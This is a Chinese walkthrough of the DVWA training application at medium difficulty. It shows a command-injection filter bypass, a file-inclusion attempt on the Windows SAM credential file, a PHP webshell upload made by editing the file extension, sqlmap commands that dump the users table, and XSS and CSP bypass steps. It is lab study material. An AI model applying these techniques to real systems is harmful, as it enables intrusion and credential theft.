dvwa ---medium

dvwa —medium

Brute Force = 尝试登录成功

和low的差不多直接爆破就行
dvwa ---medium_第1张图片

Command Injection = 尝试在服务器上列根目录

查看源代码发现只会替换掉 &&和;于是用 &
输入0.0.0.0 & dir ..\..\..
得到网站所在位置
dvwa ---medium_第2张图片

File Inclusion = 尝试读取到服务器的密码(服务器是Linux)

查看源代码发现只会替换掉../.."但是..\具有一样的效果
但是服务器搭在windows上,所以直接访问C:\Windows\System32\config\SAM
但是好像因为权限的原因无法访问

File Upload = 上传一个PHP木马,并连接成功

用继续这个来连接(好用,偷笑.jpg)

  

查看源代码发现
dvwa ---medium_第3张图片
对文件上传的后缀会检验这个可以在发送的时候用burp抓包修改
开始尝试
dvwa ---medium_第4张图片
将画圈的后缀改为.php
dvwa ---medium_第5张图片

Insecure CAPTCHA = 忽略它

SQL Injection = 尝试拿到当前表名

用sqlmap

python27 sqlmap.py -r "1.txt" -p "id" 
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 --dbs
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 -D dvwa --tables
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 -D dvwa -T guestbook --dump
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 -D dvwa -T users --dump

在这里插入图片描述
所以当前的表名为 users

SQL Injection (Blind) = 尝试拿到当前数据库名

python27 sqlmap.py -r "1.txt" -p "id"
python27 sqlmap.py -r "1.txt" --dbms mysql -p "id" --dbs

dvwa ---medium_第6张图片
数据库名为dvwa

Weak Session IDs = 忽略它

XSS (DOM) = 尝试弹一个对话框

>
用火狐和谷歌浏览器去弄直接输入都不可以。。
后来问了学长发现是浏览器太高级了
用ie就可以了
dvwa ---medium_第7张图片

XSS (Reflected) = 尝试弹一个对话框

不太会直接百度的
输入
dvwa ---medium_第8张图片

XSS (Stored) = 尝试弹一个对话框

查看源代码发现不会对用户名进行检查
但是有字数限制,用burp抓包修改来绕过

dvwa ---medium_第9张图片

CSP Bypass = 尝试弹一个对话框

查看源码发现nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="的script可以执行

dvwa ---medium_第10张图片

JavaScript = 尝试拿到正确的Token

查看js代码

function do_something(e)
{
	for(var t="",n=e.length-1;n>=0;n--)
		t+=e[n];
return t
}
setTimeout(function(){do_elsesomething("XX")},300);
function do_elsesomething(e)
{
	document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")
}

发现输入如果为success,token=“XXsseccusXX”
用burp抓包
令token=“XXsseccusXX”,phrase=“success”
成功
dvwa ---medium_第11张图片

你可能感兴趣的:(ctf)